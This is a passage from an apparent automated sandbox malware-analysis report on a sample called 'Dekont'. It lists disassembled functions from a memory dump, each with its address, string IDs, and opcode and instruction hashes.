                                  • Instruction Fuzzy Hash: 60518672D00229ABDF11DF99D840ABEBBB5AF04B14F09416AE951FB350D7789D01CBA8
                                  Function 00FEE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: EXT-
                                  • API String ID: 0-1948896318
                                  • Opcode ID: 59335655dd10dc7a15d64e6e4b0ccfa0a53e19b65710c185dd5b55eb6900d16b
                                  • Instruction ID: 49fe5a3052a7f389683418b7c9d10f820f3b70bcb251931a766d3638bd9e9df4
                                  • Opcode Fuzzy Hash: 59335655dd10dc7a15d64e6e4b0ccfa0a53e19b65710c185dd5b55eb6900d16b
                                  • Instruction Fuzzy Hash: 3D41D0729083929BD710DA76EC41B6BB7E8AF88714F04092DF994E7180E678DD04E793
                                  Function 0104C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  • Opcode ID: dc86a12e507b1b8089100455f5635687903a412c99fa972d494eafd673a63a51
                                  • Instruction ID: dc9d2edcdbddc45a8491424b82aac85b477793a156d61d44d7ad792b0294b874
                                  • Opcode Fuzzy Hash: dc86a12e507b1b8089100455f5635687903a412c99fa972d494eafd673a63a51
                                  • Instruction Fuzzy Hash: 1D4141F1D0112DABEB21DB50CD84FDEB77CAB44718F0045E9AA48AB140DB749E898FA4
                                  Function 01066B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #
                                  • API String ID: 0-1885708031
                                  • Opcode ID: 488f11254ebcc2d1df7c9ce1088b7c3c072a9d1a443872215bcb124e0676d525
                                  • Instruction ID: 8cde9faf0029058f2209574652b8a05e35ef991bcec724e2527670a18d584fb4
                                  • Opcode Fuzzy Hash: 488f11254ebcc2d1df7c9ce1088b7c3c072a9d1a443872215bcb124e0676d525
                                  • Instruction Fuzzy Hash: 8F311A31A00B4D9ADB22DB69C850BFE7BECDF44714F144068E981AB286CB7BE945CB50
                                  Function 0104CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryName
                                  • API String ID: 0-215506332
                                  • Opcode ID: c4efd8dad396490f493c04c47ef5236948fab55e816cad8888e2ebf7396fb77e
                                  • Instruction ID: e3e1e1a917eb370ad809254efbad883d344b90d5aae37e89ea3f03b0c8ee5fee
                                  • Opcode Fuzzy Hash: c4efd8dad396490f493c04c47ef5236948fab55e816cad8888e2ebf7396fb77e
                                  • Instruction Fuzzy Hash: 873145B6902515AFFB16CB49CA85EBFBBB4EF80720F114079E941A7251D7309E00EBE0
                                  Function 00FF8CB1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: WindowsExcludedProcs
                                  • API String ID: 0-3583428290
                                  • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                  • Instruction ID: 08f5e3438f68cd0b75109ea0180e3026aabcde256be7ec33d97dc58bca8e5fa0
                                  • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                  • Instruction Fuzzy Hash: 92212F3790011DBBDB229A99C844F7F7BBDBFA1BE0F154165BA059F164CA34CD029790
                                  Function 0105892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  Strings
                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0105895E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                  • API String ID: 0-702105204
                                  • Opcode ID: 8cc2f046c77fc5ffcd4f3fe6d7ea827f05163b2478b76219ec56b1081f500803
                                  • Instruction ID: c78122178d228c712dfe08e00ada23b869c76f0032c062d1a456d996ec2e0ebb
                                  • Opcode Fuzzy Hash: 8cc2f046c77fc5ffcd4f3fe6d7ea827f05163b2478b76219ec56b1081f500803
                                  • Instruction Fuzzy Hash: 7E01D4353002119FE7A46B578C85A6B7BB6EF86754B0C002EFEC116552CB25A840DA92
                                  Function 01072000 Relevance: .8, Instructions: 757COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ed28406058487e35b83fbe55d08d77f18ad4926069064ed5bcf8c2529cd60b37
                                  • Instruction ID: 6913bbd5ef2c56ed83ea556322c7856bf2868d43928d65d96122d4b0ac5f2c3b
                                  • Opcode Fuzzy Hash: ed28406058487e35b83fbe55d08d77f18ad4926069064ed5bcf8c2529cd60b37
                                  • Instruction Fuzzy Hash: 4D42E232A083419FE765CF68C890A6FBBE5BF88700F08496EFAC297251D731D945CB56
                                  Function 01068158 Relevance: .6, Instructions: 617COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 311b9b34b85595ee75f21df59a43cc97069e762d518dac12b6687525a4c86a67
                                  • Instruction ID: fec75662b77813f8916a1c70905effac8a249af9856d61269ab4bdbfca49343b
                                  • Opcode Fuzzy Hash: 311b9b34b85595ee75f21df59a43cc97069e762d518dac12b6687525a4c86a67
                                  • Instruction Fuzzy Hash: 4F423E75A003198FEB65CF69C841BADBBF9BF48300F14C19AE989EB252D7349985CF50
                                  Function 00FE2840 Relevance: .6, Instructions: 605COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86eccb216b34ad8b891b65c1008050591ea16f8ee5107087a3699b9771212d02
                                  • Instruction ID: daf895d39cd5d6a3f9d79c00addf53655c3c9283a62fed098ea662578fca52a7
                                  • Opcode Fuzzy Hash: 86eccb216b34ad8b891b65c1008050591ea16f8ee5107087a3699b9771212d02
                                  • Instruction Fuzzy Hash: 8332FE70A00755AFDB65CF69C8447BEBBFABF88300F24415DD4C69B285DB36AA02DB50
                                  Function 0107A118 Relevance: .6, Instructions: 591COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 29e38ac8857c282b344d50e3c414da44875d2ff32115075bc8e46b8635c4b572
                                  • Instruction ID: b734d01706b24fd1cf771aff1ebcef1951ec04ff86460e13918bb95d0041c402
                                  • Opcode Fuzzy Hash: 29e38ac8857c282b344d50e3c414da44875d2ff32115075bc8e46b8635c4b572
                                  • Instruction Fuzzy Hash: D122AD70B04661CAEB65CF2DC49437ABBF1BF44300F0C8499E9C68B286E735E552DB68
                                  Function 00FD6A50 Relevance: .5, Instructions: 548COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dec2966e8c91bdac8b60d45dff3d1a0ad674bffe485f88b4eb695d43433d8f93
                                  • Instruction ID: 07876121fe99eb5c66d561e1b55b173eeba320195b416ab1ce5031f3a87f0bb7
                                  • Opcode Fuzzy Hash: dec2966e8c91bdac8b60d45dff3d1a0ad674bffe485f88b4eb695d43433d8f93
                                  • Instruction Fuzzy Hash: 38328F75A04205CFDB25CF68C480BAAB7F6FF88310F24856AE995EB351DB34E841DB50
                                  Function 00FF4A35 Relevance: .4, Instructions: 423COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                  • Instruction ID: 5070bc759092c745e22eec51813ccc59fc660377e75f08fa6d104425e76366f5
                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                  • Instruction Fuzzy Hash: 2AF18F71E0021D9BDB15CF99C880BBEBBF9AF88714F088169EA45AB351E774EC41DB50
                                  Function 0106892B Relevance: .4, Instructions: 386COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 719cd12d2d5211b79c20d617896ed9704c6c5bd41559c6d0be1a547f807fdf2f
                                  • Instruction ID: 4625b4dd77928cfe9549b6f03afe0fd3f31b746c2f1e1ebf12feb95217fa3ed8
                                  • Opcode Fuzzy Hash: 719cd12d2d5211b79c20d617896ed9704c6c5bd41559c6d0be1a547f807fdf2f
                                  • Instruction Fuzzy Hash: 80D1E271A0070A8BEF15CF69C841AFEB7F9AF88314F18C16AD995E7241E735E905CB60
                                  Function 00FD65D0 Relevance: .4, Instructions: 383COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 266655216387cc82c45ca279d7c93b5cd5967badecdba70c48d9379cfa0149b7
                                  • Instruction ID: 523f9840756d1d20a526d6b128e2a4dfe829b439170816d003d26bf876c14d8e
                                  • Opcode Fuzzy Hash: 266655216387cc82c45ca279d7c93b5cd5967badecdba70c48d9379cfa0149b7
                                  • Instruction Fuzzy Hash: 53E17D71908341CFC714CF28C590A6ABBE1FF99318F198A6EE895CB351DB31E905DB92
                                  Function 00FC8397 Relevance: .4, Instructions: 380COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 69ccc9665b6dcd425568b7508189bd7e901143d76a2801d6f7337c539ababfc6
                                  • Instruction ID: 0337c382b651bcc186c05ece8803aee8039a722082b860ed3eacb4825d82a9ab
                                  • Opcode Fuzzy Hash: 69ccc9665b6dcd425568b7508189bd7e901143d76a2801d6f7337c539ababfc6
                                  • Instruction Fuzzy Hash: 45D1D172A002179BCB14DF28CD82FBA77A5BF44354F14462DF956DB281EB38E942EB50
                                  Function 01058243 Relevance: .3, Instructions: 322COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                  • Instruction ID: 3655229c06475e907b39ede0fa43667f7c4da3f64bd9929bd42b7203b02ff340
                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                  • Instruction Fuzzy Hash: 42B15374A006059FDBA4DF5AC940AAFBBF9FF84344F14845EAE8297791DA34E906CB10
                                  Function 00FE0535 Relevance: .3, Instructions: 300COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                  • Instruction ID: fa9cbb9e18561e72a29e9ee84a337e5a98a85b8cf8cbd76c74adf667927192fb
                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                  • Instruction Fuzzy Hash: 9DB14C316046859FDB21DB69C840BBEFBFAAF84300F284195E591DB391DB74ED81EB50
                                  Function 00FD83C0 Relevance: .3, Instructions: 281COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6bb6a88b7d974c117480684930690699495aa4d116471edb4f9eaf631416c4f
                                  • Instruction ID: 161e8e75db2ab6365b5eaefee81f0daf02fa7e4b7be5b933c8f1ef461f56da7b
                                  • Opcode Fuzzy Hash: c6bb6a88b7d974c117480684930690699495aa4d116471edb4f9eaf631416c4f
                                  • Instruction Fuzzy Hash: 64C178715083418FD764CF18C484BABB7E9BF88344F48496EE98987390DB74E909CF92
                                  Function 00FCC427 Relevance: .3, Instructions: 280COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 59a1cb6ae739bb4bce0a2af609f31070aa81b8de0bd075f9cf248639498046ed
                                  • Instruction ID: acff1ca01fa19e1d7a86a504136bb6aaa6a172a4dbbd667aa57202ffb2bdce17
                                  • Opcode Fuzzy Hash: 59a1cb6ae739bb4bce0a2af609f31070aa81b8de0bd075f9cf248639498046ed
                                  • Instruction Fuzzy Hash: 42B19070A002668BDB64CF68C991BA9B3F1EF44710F1485EDE54EE7281EB34AD85DF60
                                  Function 00FFE5E7 Relevance: .3, Instructions: 278COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03afd910fd35cc4bb603fced2dae7fe7a0698cc74424530b8abeab962ceab974
                                  • Instruction ID: e9079589855282a4cb41c8b6f926b158b0366ba0503e1f105396b3c0b625c3c5
                                  • Opcode Fuzzy Hash: 03afd910fd35cc4bb603fced2dae7fe7a0698cc74424530b8abeab962ceab974
                                  • Instruction Fuzzy Hash: C2A14872E0065D9FEB21DB58C944BBEBBB8AF40714F140161EA90AB2F1D7789D40DB92
                                  Function 01010185 Relevance: .3, Instructions: 276COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a7a191328d78627a86af2c3777ea585377d76c1af3d027d16237deee8254147e
                                  • Instruction ID: ecf53ef35d6901a21fd21ebda4a1a79b0f5ce01bbf401db61b8d05a453a35dac
                                  • Opcode Fuzzy Hash: a7a191328d78627a86af2c3777ea585377d76c1af3d027d16237deee8254147e
                                  • Instruction Fuzzy Hash: 0AA1A2B0B006169BDB25CF69C990BAAB7E5FF58314F004079FAC597289DB38E891CB50
                                  Function 010A4500 Relevance: .3, Instructions: 275COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96d1a56f108fa5285982a8bb4c4dfed9aa1ddaf5336532937288929bb979e5e4
                                  • Instruction ID: 6729228cbf02e51383bd6209d2be2f8fa5f57563d527876e64420c82dd15abe5
                                  • Opcode Fuzzy Hash: 96d1a56f108fa5285982a8bb4c4dfed9aa1ddaf5336532937288929bb979e5e4
                                  • Instruction Fuzzy Hash: DDA1DC72A006419FC721DFA8C980B6ABBE9FF48744F890568F585DB652D7B8ED00CB91
                                  Function 010560E0 Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1de6deddb1049ba1fd93f3d0b1c342c9724693a7f3acaadbe7b84416da6ef30f
                                  • Instruction ID: 4394d1d63b1a3d70c72e725a99e2f330c4c11cb27c9ea54b7f5983554f6de7ed
                                  • Opcode Fuzzy Hash: 1de6deddb1049ba1fd93f3d0b1c342c9724693a7f3acaadbe7b84416da6ef30f
                                  • Instruction Fuzzy Hash: C791D371E00219AFDF51CFA8D884BBFBFB5AF48750F544169EA40AB341D736E9009BA0
                                  Function 00FEE3F0 Relevance: .3, Instructions: 261COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ede1229c91d2bbe5ffaa0af551a4b7771e9c3ce7b53aadd6b4595d7e363f35b2
                                  • Instruction ID: d84f1a3b89c316d45ada8f54cb7bb9a9c3bff1d455ef329bd8aa5073cd1caf00
                                  • Opcode Fuzzy Hash: ede1229c91d2bbe5ffaa0af551a4b7771e9c3ce7b53aadd6b4595d7e363f35b2
                                  • Instruction Fuzzy Hash: 4F917832A00795CBDB24DB1AE840B7E77A5EFC4718F1940AAE945DB381E778DC01EB51
                                  Function 01026ACC Relevance: .2, Instructions: 226COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d6ee9c850477ad1e6258d71c2d153511c3734ea8d9b23e3008844f4f40ec214e
                                  • Instruction ID: 52eecf901f91bf7d6e839fa9853ac883c1fcc49f7d7321923e96848a554bac29
                                  • Opcode Fuzzy Hash: d6ee9c850477ad1e6258d71c2d153511c3734ea8d9b23e3008844f4f40ec214e
                                  • Instruction Fuzzy Hash: A381C6B1E006299FDB15DF69C840ABEBBF9FB48700F14852EE885E7640E735D940CB94
                                  Function 0109AB40 Relevance: .2, Instructions: 222COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                  • Instruction ID: d40f242d31bf76915075afb154b223c67c1d7e1ddbb56d5082705b9a0dbe08eb
                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                  • Instruction Fuzzy Hash: 3781A171B00209DFDF19DF58C8A0AAEBBF2BF84310F148569D9969B341D734E901DB50
                                  Function 0100E284 Relevance: .2, Instructions: 212COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 02730418d6fba902dbdce1388903dde80fe31d06ad3768e71f416ad2c7b612a7
                                  • Instruction ID: 0ea9af3d8dd84b191cbe3cd3cf1079cec31e78c79f890675bb2930417299ca0c
                                  • Opcode Fuzzy Hash: 02730418d6fba902dbdce1388903dde80fe31d06ad3768e71f416ad2c7b612a7
                                  • Instruction Fuzzy Hash: B3814271900609EFEB66CFA9C884AEEBBF9FF48354F148829E595A7250D730AC45CB50
                                  Function 00FEC640 Relevance: .2, Instructions: 206COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 89aefc6b320daa7cd9d1571773437eab97bc131fc3596e5c149cf55448c9defc
                                  • Instruction ID: 31b26f0a88a183e4f4aafbf459f889ec982d48d27b255e9ab7ac780635b8f484
                                  • Opcode Fuzzy Hash: 89aefc6b320daa7cd9d1571773437eab97bc131fc3596e5c149cf55448c9defc
                                  • Instruction Fuzzy Hash: 0271AE75D006659FCB258F59C8507FEBBB5FF88710F24829AF882AB350D3359801DBA0
                                  Function 01068D6B Relevance: .2, Instructions: 206COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c40daed457919992031ec1576adb59e97cbbee784a921d740036aadd8f7b3f26
                                  • Instruction ID: cedf2bee7147d010853c02bd4592ff19a42a38250fb8187285d02ea4b03ae031
                                  • Opcode Fuzzy Hash: c40daed457919992031ec1576adb59e97cbbee784a921d740036aadd8f7b3f26
                                  • Instruction Fuzzy Hash: 9071AF749042569FCB15DF59C840ABEBBF9EF45304F04C09AE9D8DB215E339DA45C7A0
                                  Function 010847A0 Relevance: .2, Instructions: 202COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8204223e078084e781568f2e4171ae36d2b3d87b4e0501bd7efb1aafbc04b23e
                                  • Instruction ID: e18c6f6d2979335bcf12cf24d77e318ac4d31a6f129b841a5ce822305f07bab0
                                  • Opcode Fuzzy Hash: 8204223e078084e781568f2e4171ae36d2b3d87b4e0501bd7efb1aafbc04b23e
                                  • Instruction Fuzzy Hash: 26715C70904206EFDB30EF99DA44A9AFBF8EF94700B11419AE6D0EB399D7368944CF54
                                  Function 00FE260B Relevance: .2, Instructions: 201COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56f76164ab893260fc8b3de12cd727d9f64d4c4268fa92d511a6f1ce9ea0523c
                                  • Instruction ID: 3e1dd7237bb5df8319c62c424ae521297b672be6427ba6eda11a806098b6581d
                                  • Opcode Fuzzy Hash: 56f76164ab893260fc8b3de12cd727d9f64d4c4268fa92d511a6f1ce9ea0523c
                                  • Instruction Fuzzy Hash: A4712771A046819FC351DF29C880B6AB7E9FF84310F0585AAF895CB352EB38DD45DB91
                                  Function 0105035C Relevance: .2, Instructions: 198COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                  • Instruction ID: 96ae0a7a82a5f5b3faeda7190a477bd6d475bff6a7c6455833a44b51c0e65ef3
                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                  • Instruction Fuzzy Hash: D4716C71A00609AFDB50DFA9C984AEFBBF8FF48704F104569E945AB250DB34EA41CB90
                                  Function 010662A0 Relevance: .2, Instructions: 198COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
